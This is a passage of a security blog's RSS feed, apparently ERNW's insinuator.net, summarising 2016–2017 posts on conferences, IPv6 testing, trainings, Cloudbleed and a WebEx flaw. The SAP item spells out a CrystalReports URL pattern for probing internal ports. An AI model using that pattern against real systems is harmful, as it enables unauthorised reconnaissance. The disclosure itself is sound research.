      <description>&lt;p&gt;At the end of last week I had the pleasure to visit the &lt;a href=&#34;https://csa-cee-summit.eu/&#34;&gt;CSA Summit CEE&lt;/a&gt; and the &lt;a href=&#34;https://bsidesljubljana.si/&#34;&gt;Bsides Event in Ljubljana&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;At CSA, I was talking about hypervisors, breakouts and an overview of security measures to protect the host. (&lt;a href=&#34;https://csa-cee-summit.eu/florian-magin/&#34;&gt;Slides&lt;/a&gt;)&lt;br&gt;&#xA;This ranged from the basic features some hypervisors provide out of the box to advanced features like SELinux, device domain models and XSM-FLASK.&lt;/p&gt;&#xA;&lt;p&gt;Most of the other talks were more targeted towards management level employees, but even as a fairly technical person I found Mike Bursell’s &lt;a href=&#34;https://csa-cee-summit.eu/mike-bursell/&#34;&gt;talk&lt;/a&gt;  highly interesting. After my talk about securing the host system from a malicious guest, he dealt with the inverse: Technologies to protect a guest from a malicious or compromised host.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Information About SAP Security Note 2336795</title>
      <link>https://insinuator.net/2017/03/information-about-sap-security-note-2336795/</link>
      <pubDate>Tue, 14 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/information-about-sap-security-note-2336795/</guid>
      <description>&lt;p&gt;Last year I encountered a slight variation of an internal port scan vulnerability for the CrystalReports component of SAP Business Objects. The original vulnerability was presented and disclosed by rapid7 in the talk “Hacking SAP Business Objects”. The corresponding slides can be found &lt;a href=&#34;http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Basically, the original vulnerability allowed port scanning of (internal) systems via the URL http://hostname/CrystalReports/viewrpt.cwr?id=$ID&amp;amp;wid=$WID&amp;amp;apstoken=ip:port@$TOKEN. By accessing this URL, different responses were received depending on if the port (parameter port in the URL) of the system (parameter ip in the URL) was in the state “open” or “closed”. The original vulnerability has been fixed a long time ago (SAP security note 1432881), but the fix did allow for a slight variation to make the attack work again.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Testing RFC 6980 Implementations with Chiron</title>
      <link>https://insinuator.net/2017/03/testing-rfc-6980-implementations-with-chiron/</link>
      <pubDate>Sat, 11 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/testing-rfc-6980-implementations-with-chiron/</guid>
      <description>&lt;p&gt;In the &lt;a href=&#34;https://insinuator.net/2017/01/ipv6-properties-of-windows-server-2016-windows-10/&#34;&gt;recent post&lt;/a&gt; on the IPv6 properties of the latest MS Windows versions I announced another one providing details on the &lt;a href=&#34;https://tools.ietf.org/rfc/rfc6980.txt&#34;&gt;RFC 6980&lt;/a&gt; related testing I had performed. So here we go.&lt;/p&gt;&#xA;&lt;p&gt;When doing IPv6 security testing there’s mainly four toolkits which can be used:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;‘ &lt;a href=&#34;https://www.secfu.net/tools-scripts/&#34;&gt;Chiron&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;Marc Heuse’s &lt;a href=&#34;https://github.com/vanhauser-thc/thc-ipv6&#34;&gt;THC-IPV6&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/FernandoGont&#34;&gt;Fernando Gont&lt;/a&gt;‘s &lt;a href=&#34;https://www.si6networks.com/tools/ipv6toolkit/&#34;&gt;IPv6 Toolkit&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;http://www.secdev.org/projects/scapy/&#34;&gt;Scapy&lt;/a&gt; (whose IPv6 capabilities are, afaik, mainly maintained by &lt;a href=&#34;https://twitter.com/guedou&#34;&gt;Guillaume Valadon&lt;/a&gt;. some tutorial on IPv6 packet crafting with scapy can &lt;a href=&#34;https://www.ernw.de/download/Advanced%20Attack%20Techniques%20against%20IPv6%20Networks-final.pdf&#34;&gt;be found here&lt;/a&gt;).&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Each of them has specific strenghts &amp;amp; limits, which will not be discussed here. For the testing I performed I chose Chiron as it has the most powerful options when it comes to IPv6 extension headers and fragmentation.&lt;/p&gt;</description>
    </item>
    <item>
      <title>31c0n 2017 in Auckland, New Zealand</title>
      <link>https://insinuator.net/2017/03/31c0n-2017-in-auckland-new-zealand/</link>
      <pubDate>Fri, 03 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/31c0n-2017-in-auckland-new-zealand/</guid>
      <description>&lt;p&gt;Last week we gave a talk at the very first &lt;a href=&#34;https://www.31c0n.co.nz/&#34;&gt;31c0n&lt;/a&gt; in Auckland, New Zealand. The talk focused mainly on the methodology that we use to assess security products.&lt;/p&gt;&#xA;&lt;p&gt;More specifically, this methodology consists of 7 steps&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Literature Research&lt;/li&gt;&#xA;&lt;li&gt;Jailbreak the Target&lt;/li&gt;&#xA;&lt;li&gt;Identify Components&lt;/li&gt;&#xA;&lt;li&gt;Understand the Architecture&lt;/li&gt;&#xA;&lt;li&gt;Map the Attack Surface&lt;/li&gt;&#xA;&lt;li&gt;Prioritize&lt;/li&gt;&#xA;&lt;li&gt;Analyze.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Details on these steps as well as general suggestions to viable alternatives for security products can be found &lt;a href=&#34;https://www.ernw.de/download/31c0n_2017_sec_appliances.pdf&#34;&gt;here&lt;/a&gt; in the slides.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers17 GSM Network – How about your own SMPP Service?</title>
      <link>https://insinuator.net/2017/03/troopers17-gsm-network-how-about-your-own-smpp-service/</link>
      <pubDate>Wed, 01 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/troopers17-gsm-network-how-about-your-own-smpp-service/</guid>
      <description>&lt;p&gt;The event of the events is getting closer and again, we are very optimistic to have a lot of awesome &lt;a href=&#34;https://www.troopers.de/&#34;&gt;trainings, talks, evening events&lt;/a&gt;, and discussions. But we again will also have some “features” and gimmicks for those of you who would like to play with new, old, or just interesting technologies. As you might remember, since some years one of these features is and again will be our own GSM Network. As we are improving &lt;a href=&#34;https://insinuator.net/2016/03/troopers16-gsm-network-2/&#34;&gt;our setup&lt;/a&gt; from year to year, this time we’d like to give you the chance to actively participate with ideas and your own services.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Agile Development &amp; Security</title>
      <link>https://insinuator.net/2017/02/agile-development-security/</link>
      <pubDate>Sun, 26 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/agile-development-security/</guid>
      <description>&lt;p&gt;I’m a big fan of Chris Gates’ publications on &lt;a href=&#34;https://www.slideshare.net/chrisgates/devoops-redux-ken-johnson-chris-gates-appsec-usa-2016&#34;&gt;DevOops&lt;/a&gt; and &lt;a href=&#34;http://www.carnal0wnage.com/papers/LARES-From-Low-To-Pwned.pdf&#34;&gt;From Low to Pwned&lt;/a&gt;. The content reflects a lot of issues that we also experience in many assessments in general and assessments &lt;a href=&#34;https://wycd.net/posts/2017-02-21-ibm-whole-cluster-privilege-escalation-disclosure.html&#34;&gt;in agile environments in particular&lt;/a&gt;. In addition, we were supporting several projects recently that were organized in an agile way. In this post, I want to summarize some thoughts on how security work can/should be integrated into agile projects. The post was also a result from the preparation of our upcoming Troopers workshop on &lt;a href=&#34;https://www.troopers.de/events/troopers17/730_docker_security__secdevops/&#34;&gt;Docker Security &amp;amp; Devops&lt;/a&gt;, which of course also covers organizational aspects, but not to the degree this post describes them.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cloudflare Incident #Cloudbleed</title>
      <link>https://insinuator.net/2017/02/cloudflare-incident-%23cloudbleed/</link>
      <pubDate>Fri, 24 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/cloudflare-incident-%23cloudbleed/</guid>
      <description>&lt;p&gt;Exactly one week ago I noticed an “urgent” tweet from Tavis Ormandy to get in contact with the Cloudflare team.&lt;br&gt;&#xA;Normally when a tweet like this appears from Tavis, something is horribly broken. Well, today we know the background of this tweet as the &lt;a href=&#34;https://bugs.chromium.org/p/project-zero/issues/detail?id=1139&#34;&gt;bug tracker&lt;/a&gt; issue went public and it exposed quite a bug from Cloudflare.&lt;/p&gt;&#xA;&lt;p&gt;While there is some background story how Tavis found the bug, because he wasn´t actively looking into the Cloudflare infrastructure and it was rather discovered by accident when odd data appeared in his fuzzing corpus. When he looked closely he found data that was not in any mean related to the expected data from various websites.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Exploitation of IMS in absence of confidentiality and integrity protection</title>
      <link>https://insinuator.net/2017/02/exploitation-of-ims-in-absence-of-confidentiality-and-integrity-protection/</link>
      <pubDate>Fri, 17 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/exploitation-of-ims-in-absence-of-confidentiality-and-integrity-protection/</guid>
      <description>&lt;p&gt;IP Multimedia Subsystem (IMS) offers many multimedia services to any IP-based access network, such as LTE or DSL. In addition to VoLTE, IMS adds service provider flexibility, better QoS and charging control to the 4th generation of mobile networks. IMS exchanges SIP messages with its users or other IMS and usually these communications are secured by TLS or IPSec. But if an attacker manages to break the confidentiality and the integrity with IMS, he would find it vulnerable to several attacks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Summary of “Lockpicking in the IoT” at 33C3</title>
      <link>https://insinuator.net/2017/02/summary-of-lockpicking-in-the-iot-at-33c3/</link>
      <pubDate>Tue, 14 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/summary-of-lockpicking-in-the-iot-at-33c3/</guid>
      <description>&lt;p&gt;“Lockpicking in the IoT, …or why adding BTLE to a device sometimes isn’t smart at all” by Ray was one of my favourite talks, as it beautifully showed many different attack vectors as well as giving a nice guide for getting started in this area.&lt;/p&gt;&#xA;&lt;p&gt;It impressed me how carefree vendors and startups handled hardware and software security in “smart” devices as it seems that their devices were more or less easy to own. In his talk Ray pointed out physical AND implementational weaknesses that remained even after he reported them to the vendors.&lt;br&gt;&#xA;The most prominent sample he gave was when he opened a “Masterlock” by spinning a magnet on the lock itself to open it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>33c3 Talks – What could possibly go wrong with “insert x86 instruction here” ?</title>
      <link>https://insinuator.net/2017/02/33c3-talks-what-could-possibly-go-wrong-with-insert-x86-instruction-here/</link>
      <pubDate>Wed, 01 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/33c3-talks-what-could-possibly-go-wrong-with-insert-x86-instruction-here/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://media.ccc.de/v/33c3-8044-what_could_possibly_go_wrong_with_insert_x86_instruction_here&#34;&gt;This&lt;/a&gt; was one of the few technical talks at 33c3 I managed to see, by that I mean live-stream during an access control shift, by Clémentine Maurice and Moritz Lipp.&lt;/p&gt;&#xA;&lt;p&gt;The talk gave an overview of some already known possible information leaks by abusing certain x86 instructions(the same concept applies to ARM too though) and demonstrating the various ways an attacker could use them. They started off by quickly explaining how the caches on modern CPUs are set up and how they work and how you can exploit the timing differences in memory accesses to leak data without actually knowing the content of the cache. This data leak can then be used to establish a covert channel.&lt;/p&gt;</description>
    </item>
    <item>
      <title>White Paper on Incident Handling First Steps, Preparation Plans, and Process Models</title>
      <link>https://insinuator.net/2017/02/white-paper-on-incident-handling-first-steps-preparation-plans-and-process-models/</link>
      <pubDate>Wed, 01 Feb 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/02/white-paper-on-incident-handling-first-steps-preparation-plans-and-process-models/</guid>
      <description>&lt;p&gt;We just published my &lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Whitepaper58_IncidentHandlingFirstSteps_signed.pdf&#34;&gt;Whitepaper about First Steps, Preparation Plans, and Process Models for Incident Handling&lt;/a&gt;, that I wrote to pass the time between Christmas and New Year. The whitepaper sums up information that I consider to be useful to prepare for IT security incidents as a conclusion from the incidents in which we supported over the past year.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Whitepaper58_IncidentHandlingFirstSteps_signed.pdf&#34;&gt;&lt;img src=&#34;teaser.jpg&#34; alt=&#34;&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Have you for example thought about classes of incidents that are most likely to affect you and formulated Incident Handling Preparation Plans for those incidents?&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Properties of Windows Server 2016 / Windows 10</title>
      <link>https://insinuator.net/2017/01/ipv6-properties-of-windows-server-2016-/-windows-10/</link>
      <pubDate>Mon, 30 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/ipv6-properties-of-windows-server-2016-/-windows-10/</guid>
      <description>&lt;p&gt;In this post we’ll take a detailed look at the properties of the Windows Server 2016 IPv6 stack.&lt;br&gt;&#xA;I perform(ed) this exercise for several reasons:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Server 2016 is the latest OS released by Microsoft so this might give an indication as for their plans &amp;amp; strategy when it comes to supporting certain specifications.&lt;br&gt;&#xA;(here you may keep in mind that the ~50 IETF meetings having passed since the publication of RFC 2460 provided ample opportunity for creative minds to come up with ever new ideas for “enhancing” IPv6, without too much real-life feedback/reality checks from enterprise space though, as simply not many of such organizations have deployed it at scale… or are incentivized to send their employees to week-long meetings in expensive hotels on other continents twice a year…).&lt;/li&gt;&#xA;&lt;li&gt;as I laid out &lt;a href=&#34;https://insinuator.net/2016/12/ipv6-configuration-approaches-for-servers/&#34;&gt;in this post&lt;/a&gt; the configuration approach an organization takes for their servers might depend on the support of specific features.&lt;/li&gt;&#xA;&lt;li&gt;obviously for both IPv6 planning and operations it might be helpful to understand the respective behavior of individual operating systems (which is why we researched stuff like &lt;a href=&#34;https://www.ernw.de/download/ERNW_Whitepaper_IPv6_RAs_RDNSS_DHCPv6_Conflicting_Parameters.pdf&#34;&gt;this&lt;/a&gt; or &lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Whitepaper57_IPv6_lab_source_address_selection_signed.pdf&#34;&gt;this&lt;/a&gt; in the past).&lt;/li&gt;&#xA;&lt;li&gt;many years ago Microsoft published white papers with details as for the TCP/IP parameters of their OSs (incl. stuff like registry parameters to control it etc.) but I’m not aware of such a document for Server 2016 or Windows 10. I hence hope this post can somewhat contribute to public knowledge of the intricacies of their latest IPv6 stack.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;strong&gt;Version&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW at 33C3 – Part 1</title>
      <link>https://insinuator.net/2017/01/ernw-at-33c3-part-1/</link>
      <pubDate>Thu, 26 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/ernw-at-33c3-part-1/</guid>
      <description>&lt;p&gt;This is &lt;strong&gt;part 1&lt;/strong&gt; of our report series on &lt;strong&gt;interesting talks of the 33rd Congress&lt;/strong&gt; of the Chaos Computer Club. Every year the congress attracts hundreds (up to twelve thousand this year) of technical interested people with the opportunity to socialize and exchange knowledge with each other. The congress is organized by the European largest hacker association and speakers give talks about technical and societal issues like surveillance, privacy, freedom of information, data security and various more.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TR17 Training: Hacking 101</title>
      <link>https://insinuator.net/2017/01/tr17-training-hacking-101/</link>
      <pubDate>Thu, 26 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/tr17-training-hacking-101/</guid>
      <description>&lt;p&gt;Hi there,&lt;br&gt;&#xA;Like in recent years the popular &lt;a href=&#34;https://www.troopers.de/events/troopers17/735_hacking_101/&#34;&gt;Hacking 101 workshop&lt;/a&gt; will take place on TROOPERS17, too! The workshop will give attendees an insight into the &lt;strong&gt;hacking techniques&lt;/strong&gt; required for &lt;strong&gt;penetration testing&lt;/strong&gt;. These techniques will cover various topics:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;information gathering&lt;/li&gt;&#xA;&lt;li&gt;network scanning&lt;/li&gt;&#xA;&lt;li&gt;web application hacking&lt;/li&gt;&#xA;&lt;li&gt;low-level exploitation&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;…and more!&lt;/p&gt;&#xA;&lt;p&gt;During this workshop &lt;strong&gt;you will learn&lt;/strong&gt;, step by step, a &lt;strong&gt;testing methodology&lt;/strong&gt; that is applicable to the majority of scenarios. So imagine you have to &lt;strong&gt;assess&lt;/strong&gt; the &lt;strong&gt;security of a system&lt;/strong&gt; running on the Internet. How would you start? First, you need a good understanding about the target, including running services or related systems. Just &lt;strong&gt;scanning&lt;/strong&gt; an IP will most likely not reveal a lot of information about the system. The gathered information may help you to identify communication relations of services that could include vulnerabilities. A brief understanding of the target and it’s related systems/services/applications will make scanning and &lt;strong&gt;identifying vulnerabilities&lt;/strong&gt; a lot easier and more effective. Then, the last step will be the &lt;strong&gt;exploitation&lt;/strong&gt; of the identified vulnerabilities, with the ultimate aim to &lt;strong&gt;get access to the target system&lt;/strong&gt; and pivot to other, probably internal, systems and resources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cisco: Magic WebEx URL Allows Arbitrary Remote Command Execution – Project Zero</title>
      <link>https://insinuator.net/2017/01/cisco-magic-webex-url-allows-arbitrary-remote-command-execution-project-zero/</link>
      <pubDate>Tue, 24 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/cisco-magic-webex-url-allows-arbitrary-remote-command-execution-project-zero/</guid>
      <description>&lt;p&gt;Tavis did it again[1]. As stated in the title it is possible to remotely execute commands via the Chrome extension for the popular meeting software Cisco WebEx. This post summarizes the most relevant information for you.&lt;/p&gt;&#xA;&lt;p&gt;A test page with working &lt;a href=&#34;https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=267784&#34;&gt;demo code&lt;/a&gt; is available to check for the issue on Windows systems [2]. From our point of view the Chrome extension is affected by this issue as well as the Firefox extension as both extension APIs are quite similar. However, Mozilla blocked the FireFox plugin to protect users from the risk of being exploited through the plugin[3][4]. IE seems to be fine thanks to Cisco’s decision to invoke the WebEx Meeting Center via e.g. ActiveX.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Insomni’hack pwn50 write-up</title>
      <link>https://insinuator.net/2017/01/insomnihack-pwn50-write-up/</link>
      <pubDate>Tue, 24 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/insomnihack-pwn50-write-up/</guid>
      <description>&lt;p&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;i´ve looked a bit at the &lt;a href=&#34;https://insomnihack.ch/?page_id=16&#34;&gt;Insomni’hack CTF&lt;/a&gt; which took place on the 21st January and lasted for 36 hours.&lt;br&gt;&#xA;For the sake of warming up a bit for our Troopers workshop &lt;a href=&#34;https://www.troopers.de/events/troopers17/728_windows_and_linux_exploitation/&#34;&gt;Windows and Linux Exploitation&lt;/a&gt;,&lt;br&gt;&#xA;I decided to create a write-up of the first pwn50 challenge.&lt;/p&gt;&#xA;&lt;p&gt;To grab your own copy of the presented files you can also find it in our &lt;a href=&#34;https://github.com/ernw/insinuator-snippets/tree/master/Insomnihack&#34;&gt;Github&lt;/a&gt; repository:&lt;/p&gt;&#xA;&lt;p&gt;When downloading the first binary, we are presented with 2 files:&lt;/p&gt;</description>
    </item>
    <item>
      <title>First dedicated Forensic Computing Training at TR17</title>
      <link>https://insinuator.net/2017/01/first-dedicated-forensic-computing-training-at-tr17/</link>
      <pubDate>Wed, 11 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/first-dedicated-forensic-computing-training-at-tr17/</guid>
      <description>&lt;p&gt;I am looking forward to our newly introduced dedicated Forensic Computing Training at TR17!&lt;br&gt;&#xA;We will start the first day with a detailed background briefing about Forensic Computing as a Forensic Science, Digital Evidence, and the Chain of Custody. The rest of the workshop we will follow the Order of Volatility starting with the analysis of persistent storage using file system internals and carving, as well as RAID reassembly with lots of hands-on case studies using open source tools. As a next step, we will smell the smoking gun in live forensics exercises. Depending on your preferences we will then dig a bit into memory forensics and network forensics.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2017 – 2nd Round of Talks</title>
      <link>https://insinuator.net/2017/01/telcosecday-2017-2nd-round-of-talks/</link>
      <pubDate>Tue, 03 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/telcosecday-2017-2nd-round-of-talks/</guid>
      <description>&lt;p&gt;Hello and a Happy new Year!&lt;/p&gt;&#xA;&lt;p&gt;There are only two and a half months left, so I’d like to publish the next two talks for &lt;a href=&#34;https://www.troopers.de/troopers17/telcosec-day/&#34;&gt;TelcoSecDay 2017&lt;/a&gt;, taking place at 21st of March in Heidelberg. Both talks are about the security of an upcoming technology which importance will raise in near future: 5G Networks.&lt;/p&gt;&#xA;&lt;p&gt;One of the talks will be from an attacker’s point of view, highlighting weaknesses of 2G/3G/4G networks and what we have to fix in 5G, and the other one will give us insights into current developments of the 3GPP standardization group.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TR17 Training: Crypto attacks and defenses</title>
      <link>https://insinuator.net/2017/01/tr17-training-crypto-attacks-and-defenses/</link>
      <pubDate>Tue, 03 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/01/tr17-training-crypto-attacks-and-defenses/</guid>
      <description>&lt;p&gt;This is a guest blog written by &lt;a href=&#34;https://www.troopers.de/events/speaker/557_jean-philippe_aumasson/&#34;&gt;Jean-Philippe Aumasson&lt;/a&gt; &amp;amp; &lt;a href=&#34;https://www.troopers.de/events/speaker/978_philipp__jovanovic/&#34;&gt;Philipp Jovanovic&lt;/a&gt; about their upcoming TROOPERS17 training: &lt;a href=&#34;https://www.troopers.de/events/troopers17/725_crypto_attacks_and_defenses/&#34;&gt;Crypto attacks and defenses. &lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;The &lt;a href=&#34;https://www.troopers.de/events/troopers16/578_crypto_for_developers/&#34;&gt;1-day training from last TROOPERS&lt;/a&gt; has become a 2-day training, featuring even more real-world attacks and defenses as well as new hands-on sessions! We’ll teach you, step by step, how to spot and exploit crypto vulnerabilities, how to use the strongest forms of state-of-the-art cryptography to secure modern systems (like IoT or mobile applications), and bring you up to speed on the latest and greatest developments in the world of cryptography, such as TLS 1.3, blockchains, and post-quantum crypto.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Woolim – Lifting the Fog on DPRK’s Latest Tablet PC</title>
      <link>https://insinuator.net/2016/12/woolim-lifting-the-fog-on-dprks-latest-tablet-pc/</link>
      <pubDate>Wed, 28 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/woolim-lifting-the-fog-on-dprks-latest-tablet-pc/</guid>
      <description>&lt;p&gt;Niklaus, Manuel and me had a great time speaking about one of the latest Tablet PCs from DPRK at &lt;a href=&#34;https://fahrplan.events.ccc.de/congress/2016/Fahrplan/events/8143.html&#34;&gt;33C3 this year&lt;/a&gt;. Our work on &lt;a href=&#34;https://insinuator.net/2015/07/redstar-os-watermarking/&#34;&gt;RedStar OS from last year&lt;/a&gt; revealed a nasty watermarking mechanism that can be used to track the origin and distribution path of media files in North Korea. We have seen some interesting dead code in some of RedStar’s binaries that indicated a more sophisticated mechanism to control the distribution of media files. We got hands on a Tablet PC called “Ul-lim” that implemented this advanced control mechanism.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Configuration Approaches for Servers</title>
      <link>https://insinuator.net/2016/12/ipv6-configuration-approaches-for-servers/</link>
      <pubDate>Wed, 21 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/ipv6-configuration-approaches-for-servers/</guid>
      <description>&lt;p&gt;In this post I’ll discuss configuration approaches for systems which usually have been configured with “static” IP parameters in the IPv4 age/context (like servers in data centers). When it comes to IPv6 there are more options and we’ll have a look at their implications and potential advantages/disadvantages.&lt;/p&gt;&#xA;&lt;p&gt;From my perspective there’s mainly four possible approaches which we see being implemented or considered in our (predominantly enterprise) customer space. Before we have a closer look at those let’s quickly write down requirements that the involved planners or sysadmins might have in mind when it comes to provisioning the systems in question. Some of those requirements might seem obvious but it could still make sense to note them for the discussion to follow. These might include:&lt;/p&gt;</description>
    </item>
    <item>
      <title>3rd Round of TROOPERS17 Talks</title>
      <link>https://insinuator.net/2016/12/3rd-round-of-troopers17-talks/</link>
      <pubDate>Tue, 20 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/3rd-round-of-troopers17-talks/</guid>
      <description>&lt;p&gt;We had to make some tough choices regarding our &lt;a href=&#34;http://troopers.de&#34;&gt;TROOPERS17&lt;/a&gt; Main Conference Agenda. Thank you again to everyone for submitting! The full agenda will be published later this week, but for now here are the next round of talks!&lt;/p&gt;&#xA;&lt;p&gt;Ivan Pepelnjak: &lt;em&gt;Securing Network Automation&lt;/em&gt;&lt;br&gt;&#xA;If you have operational experience in running large networks then you’re probably yearning to replace the traditional way of managing individual network devices via SSH with something better and more reliable. Software Defined Networking (SDN) was touted as the all-encompassing solution, but what we got instead is a heap of academic ideas, several platforms that require as much investment as an SAP deployment, and a bunch of proprietary products focused more on increasing lock-in and vendor revenue than solving operational problems.&lt;/p&gt;</description>
    </item>
    <item>
      <title>PoC Con Seoul 2016</title>
      <link>https://insinuator.net/2016/12/poc-con-seoul-2016/</link>
      <pubDate>Thu, 15 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/poc-con-seoul-2016/</guid>
      <description>&lt;p&gt;Recently I had the pleasure to join the &lt;a href=&#34;http://www.powerofcommunity.net/&#34;&gt;PowerOfCommunity&lt;/a&gt; conference in Seoul. Florian and Felix attended the conference in the past and enjoyed it a lot, so I took the opportunity to join this year. From what I had heard the conference is highly technical, offensive security and community focused (surprise 😉 ). Boy did they deliver!&lt;br&gt;&#xA;Located in a hotel next to a nice park and close to the famous Gangnam district in Seoul we came together to feel the power of community. The conference was planned for two days and offered two tracks per day. Several key talks were presented for everyone.&lt;br&gt;&#xA;I really liked the topics a lot. Some contributions I found particularly interesting were:&lt;br&gt;&#xA;Petr Švenda with “The Million-Key Question – How RSA Public Key Leaks Its Origin”, where he presented his research of fingerprinting RSA public keys. By analyzing the RSA keys from smartcards and software sources he was able to find similarities between them, which allowed fingerprinting the generating source for some cases. With this information it could be possible gather some potentially important details from simple keys. He is currently expanding his work, please send him an E-Mail if you have RSA keys from an exotic resource. 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>TR17 Training: Fuzzing with American Fuzzy Lop, Address Sanitizer and LibFuzzer</title>
      <link>https://insinuator.net/2016/12/tr17-training-fuzzing-with-american-fuzzy-lop-address-sanitizer-and-libfuzzer/</link>
      <pubDate>Thu, 15 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/tr17-training-fuzzing-with-american-fuzzy-lop-address-sanitizer-and-libfuzzer/</guid>
      <description>&lt;p&gt;This is a guest blog written by &lt;a href=&#34;https://hboeck.de/&#34;&gt;Hanno Böck&lt;/a&gt; who will be running the &lt;a href=&#34;https://www.troopers.de/events/troopers17/737_fuzzing_with_american_fuzzy_lop_address_sanitizer_and_libfuzzer/&#34;&gt;Fuzzing with American Fuzzy Lop, Address Sanitizer and LibFuzzer&lt;/a&gt; at TROOPERS17.&lt;/p&gt;&#xA;&lt;p&gt;Fuzzing is a very old technique to find bugs and vulnerabilities in software. However it has seen a new push in recent years due to vastly improved tools. The compilers gcc and clang have received Sanitizer tools that allow finding a lot of bugs like use after free errors and out of bounds reads that are otherwise very hard to find.&lt;/p&gt;</description>
    </item>
    <item>
      <title>2nd Rounds of TROOPERS17 Talks!</title>
      <link>https://insinuator.net/2016/12/2nd-rounds-of-troopers17-talks/</link>
      <pubDate>Wed, 14 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/2nd-rounds-of-troopers17-talks/</guid>
      <description>&lt;p&gt;It is the end of the year and we are hoping it is not too hectic of a time for you all! But if it is, hopefully the announcement of our next round of &lt;a href=&#34;http://troopers.de&#34;&gt;TROOPERS17&lt;/a&gt; talks is enough to get you in the TROOPERS (if not the holiday) spirit 🙂&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;Francis Alexander &amp;amp; Bharadwaj Machiraju: &lt;em&gt;How we hacked Distributed Configuration Management Systems&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;With increase in necessity of distributed applications, coordination and configuration management tools for these classes of applications have popped up. These systems might pop-up occasionally during penetration tests. The major focus of this research was to find ways to abuse these systems as well as use them for getting deeper access to other systems.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A short Addendum on the Mirai Botnet Blog Post</title>
      <link>https://insinuator.net/2016/12/a-short-addendum-on-the-mirai-botnet-blog-post/</link>
      <pubDate>Thu, 08 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/a-short-addendum-on-the-mirai-botnet-blog-post/</guid>
